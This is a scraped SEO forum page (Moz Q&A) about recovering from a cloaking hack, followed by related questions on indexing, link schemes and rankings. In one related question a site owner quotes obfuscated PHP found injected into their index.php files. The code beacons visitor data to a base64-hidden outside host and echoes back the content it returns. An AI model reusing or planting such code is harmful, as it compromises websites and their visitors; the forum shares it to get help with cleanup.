Hacked site vs No site
-
So I have this website that got hacked with cloaking and Google has labeled it as such in the SERPs. With due reason of coarse. My question is I am going to relaunch an entirely new redesigned website in less than 30 days, do I pull the hacked site down until then or leave it up? Which option is better?
-
Hi Rich,
I cleaned up a clients site using a method similar to what Derk described. The developer basically kept all the site exactly the same, removed infected areas and then let Google know. The vulnerability was in an old plugin.
It took 24 hours and the 'this website may be hacked' was removed by Google. I dont think it is as dire as you think as long you have a competent developer.
-
According to Google you should put your site in quarantaine (status 503) and make it available again when it's cleaned (in your case - relaunched). Source: https://support.google.com/webmasters/answer/2600719?hl=en.
Personally, I would also consider the option to clean your current site: 3/4 weeks is a very long time and it could have a negative impact on your rankings.
Dirk
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Infinite Scrolling on Publisher Sites - is VentureBeat's implementation really SEO-friendly?
I've just begun a new project auditing the site of a news publisher. In order to increase pageviews and thus increase advertising revenue, at some point in the past they implemented something so that as many as 5 different articles load per article page. All articles are loaded at the same time and from looking in Google's cache and the errors flagged up in Search Console, Google treats it as one big mass of content, not separate pages. Another thing to note is that when a user scrolls down, the URL does in fact change when you get to the next article. My initial thought was to remove this functionality and just load one article per page. However I happened to notice that VentureBeat.com uses something similar. They use infinite scrolling so that the other articles on the page (in a 'feed' style) only load when a user scrolls to the bottom of the first article. I checked Google's cached versions of the pages and it seems that Google also only reads the first article which seems like an ideal solution. This obviously has the benefit of additionally speeding up loading time of the page too. My question is, is VentureBeat's implementation actually that SEO-friendly or not. VentureBeat have 'sort of' followed Google's guidelines with regards to how to implement infinite scrolling https://webmasters.googleblog.com/2014/02/infinite-scroll-search-friendly.html by using prev and next tags for pagination https://support.google.com/webmasters/answer/1663744?hl=en. However isn't the point of pagination to list multiple pages in a series (i.e. page 2, page 3, page 4 etc.) rather than just other related articles? Here's an example - http://venturebeat.com/2016/11/11/facebooks-cto-explains-social-networks-10-year-mission-global-connectivity-ai-vr/ Would be interesting to know if someone has dealt with this first-hand or just has an opinion. Thanks in advance! Daniel
White Hat / Black Hat SEO | | Daniel_Morgan1 -
Competitors Linking to My Site
One of the more successful competitors in my niche has embarked on new strategy that seems to be working well for him. I noticed that many new links began to appear to my site from my competitor's stable of many websites. It appears that he has setup a link wheel to benefit a site that has been in the top Google position for several months now. The rim of the wheel links back to authority sites, including my own main site (established 7 years, now hanging on to the lowly 10th place on the serp). So the strategy seems to be: a) create a dozen sites that no-follow link back to authority sites including competitors, b) place links in a such a manner (bottom of page, uncolored links, from images) that a customer is unlikely to ever click on it, c.) do-follow to your own site and blast it to the top of Google. I don't think this competitor is worried about getting penalized. I've been watching this for years. When one site gets burned, he just shifts things around and brings up another one of his sites. He seems to age them for years, calling them up one by one as they are needed. Has anyone else noticed this? Is it a trend? Because it sure seems to work. He's crowded the front page now with 4 of his sites. Would it be appropriate for me to "disavow" his links? Would it matter?
White Hat / Black Hat SEO | | DarrenX0 -
Site De-Indexed except for Homepage
Hi Mozzers,
White Hat / Black Hat SEO | | emerald
Our site has suddenly been de-indexed from Google and we don't know why. All pages are de-indexed in Google Webmaster Tools (except for the homepage and sitemap), starting after 7 September: Please see screenshot attached to show this: 7 Sept 2014 - 76 pages indexed in Google Webmaster Tools 28 Sept until current - 3-4 pages indexed in Google Webmaster Tools including homepage and sitemaps. Site is: (removed) As a result all rankings for child pages have also disappeared in Moz Pro Rankings Tracker. Only homepage is still indexed and ranking. It seems like a technical issue blocking the site. I checked for robots.txt, noindex, nofollow, canonical and site crawl for any 404 errors but can't find anything. The site is online and accessible. No warnings or errors appear in Google Webmaster Tools. Some recent issues were that we moved from Shared to Dedicated Server around 7 Sept (using same host and location). Prior to the move our preferred domain was www.domain.com WITH www. However during the move, they set our domain as domain.tld WITHOUT the www. Running a site:domain.tld vs site:www.domain.tld command now finds pages indexed under non-www version, but no longer as www. version. Could this be a cause of de-indexing? Yesterday we had our host reset the domain to use www. again and we resubmitted our sitemap, but there is no change yet to the indexing. What else could be wrong? Any suggestions appeciated. Thanks. hDmSHN9.gif0 -
Rank drop ecommerce site
Hello, We're going to get an audit, but I would like to hear some ideas on what could cause our ranking drop. There's no warnings in GWT. We deleted 17 or so blogs (that had no backlinks pointing to these blogs and were simply for easy links) last summer thinking that they weren't white hat so we had to start eliminating them. At the same time, we eliminated a few sitewide paid links that were really strong. With all of this deletion, our keywords started to drop. For example, our main keyword went from first to third/fourth. With the deletions, our keywords dropped immediately a couple of spots, then with no more deletions, all of our keywords have been slowly dropping over the last seven months or so. Right now we are at the bottom of the first page for that same main keyword, and other keywords look similar. We have 70 linking root domains, of which: 15 are blogs with no backlinks that were created simply for the purpose of easy links. We didn't delete them all yet because of the immediate ranking drop when we deleted the last ones. One PR5 site has links to our home page scattered throughout it's lists of resources for people in different states in the US. It doesn't look like a standard paid link site, but it has many paid links in it's different pages. One PR4 site has our logo with another paid link logo at the bottom of one of it's pages. There are 2 other paid links from two PR4 sites that look editorial. There are other links on the sites to other websites that are paid. All links for these 2 sites look editorial. That's all the bad stuff. Other things that could be causing drop in rank - > Our bread crumbs are kind of messed up. We have a lot of subcategory pages that rel=cononical to main categories in the menu. We did this because we had categories that were exactly the same. So you'll drill down on a category page and you'll end up on a main category. To the average user, it seems perfectly fine. Our on-site SEO still has a few pages that repeat words in the titles and h1 tags several times (especially our #1 main keyword), titles similar to something like: running shoes | walking shoes | cross-training shoes where a word is repeated 2 or 3 times. Also, there are a few pages that are more keyword stuffed than we would like in the content. Just a couple of paragraphs but 2 keywords are dispersed in them three times each. The keywords in this content is not in different variations, it's exactly the keyword. We've still got a few URLs that are keywords stuffed with like 3 different keywords. We may have many 404 errors (due to some mistakes we made with the URLs in our cart) - if Google hasn't deindexed them all then we could have dozens of 404s on important category pages. But nothing is showing up in GWT. Our sitemap does not include any broken links. Google is confused about our branding it seems. I'm adding branding to the on-site SEO but right now Google often shows keywords as our branding when Google changes the way the title tag is displayed sometimes in the search engines. We don't link out to anyone. We have lots of content, almost no duplicate content, and some authoritative very comprehensive articles. Your thoughts on what to do to get our rankings back up?
White Hat / Black Hat SEO | | BobGW0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Untrusted site - malware!
I recently had my link profile done as I was badly effected by something in 2012 (Penguin, Panda.. who knows? never got a message from google in webmaster about anything). Loads of INBOUND links were identified as being 'dodgy'' and the person highlighted them in different colors. However, another seo éxpert' told me to leave them (perhaps remove just 3 of them) and don't bother with the rest. Now I am not sure what to do? Any opinions? RED
White Hat / Black Hat SEO | | Llanero
3 were highlighted as being from untrusted malware. I think I should disavow them but really, would 3 make that much difference for a fall in my site? ORANGE
240 were said to be spam articles and I was advised:
The following pages highlighted in orange are on sites created for the purpose of publishing articles for link building. Since the same articles appear on multiple sites, Google views this as duplicate content. Links to Monteverde Tours in these articles should be removed or tagged "nofollow." Where this is not possible, the domains should be disavowed. YELLOW
85 were said to be from Low-quality directories
The following pages highlighted in yellow are on low-quality directories and link farms. Links to Monteverde Tours on these pages should be removed or the domains disavowed. GREEN
340 were said to be from sites were the page was not found , Account suspended, Problem loading page, Link removed, domain expired
The following pages highlighted in green include pages whose links to Monteverde Tours have been removed and pages that were inaccessible for various reasons, as shown in the Comments column. These pages or their domains should be disavowed to remove them from the Google index. I have read (and asked on this forum) about disavow but the more I read the more I am getting confused about the next action. I tried for one year to get rid of any bad outbound links, did blogging, social media, improved content, landing pages etc but all to no avail. Any opinions appreciated. I am not looking for a magic bullet, I know there isn't one. I know I need to keep improving content etc but after a year of NO improvements should I consider the link removal route? <colgroup><col width="215"></colgroup>
| Untrusted site - malware! |0 -
HELP - Site architecture of E-Commerce Mega Menu - Linkjuice flow
Hi everyone, I hope you have a couple of mins to give me your opinion. Ecommerce site has around 2000 products, in english and spanish, and around only 70 hits per day if that. We have done a lot of optimisation on the site - Page Titles, URL's, Content, H1's, etc.... Everything on page is pretty much under control, except I am starting to realise the site architecture could be harming our SEO efforts. Once someone arrives on site they are language detected and do a 302 to either domain.com/EN or domain.com/ES depending on their preferred language. Then on the homepage, we have the big MEGA MENU - and we have
White Hat / Black Hat SEO | | bjs2010
CAT 1
SubCat 1
SubsubCat 1
SubsubCat 2
SubsubCat 3 Overall, there are 145 "categories". Plus links to some CMS pages, like Home, Delivery terms, etc... Each Main Category, contains the products of everything related to that category - so for example:
KITCHENWARE
COOKWARE BAKINWARE
SAUCEPANS BOWLS
FRYING PANS Kitchenware contains: ALL PRODUCTS OF SUBCATS BELOW, SO COOKWARE ITEMS, SAUCEPANS, FRYING PANS, BAKINGWARE, etc... plus links to those categories through breadcrumbs and a left hand nav in addition to the mega menu above. So once the bots hit the site, immediately they have this structure to deal with. Here is what stats look like:
Domain Authority: 18 www.domain.com/EN/
PA: 27
mR: 3.99
mT: 4.90 www.domain.com/EN/CAT 1
PA: 15
mR: 3.05
mT: 4.54 www.domain.com/EN/CAT 1/SUBCAT1
PA: 15
mR: 3.05
mT: 4.54 Product pages themselves - have a PA of 1 and no mR or mT. I really need some other opinions here - I am thinking of: Removing links in Nav menu so it only contains CAT1 and SUBCAT1 but DELETE SUBSUBCATS1 which represent around 80 links Remove products within the CAT1 page - eg., the CAT 1 would "tile" graphical links to subcategories, but not display products themselves. So products are only available right at the lowest part of the chain (which will be shortened) But I am willing to hear any other ideas please - maybe another alternative is to start building links to boost DA and linkjuice? Thanks all, Ben0 -
Do sitewide links from other sites hurt SEO?
A friend of mine has a pagerank 3 website that links to all my pages on my site on every page of his site. The anchor text of all these links are the title of each page that it links to. Does this hurt SEO? I can have him change to the links to whatever i want, so if it does hurt, what should i change the anchor text to if needed? Thanks mozzers! Ron
White Hat / Black Hat SEO | | Ron100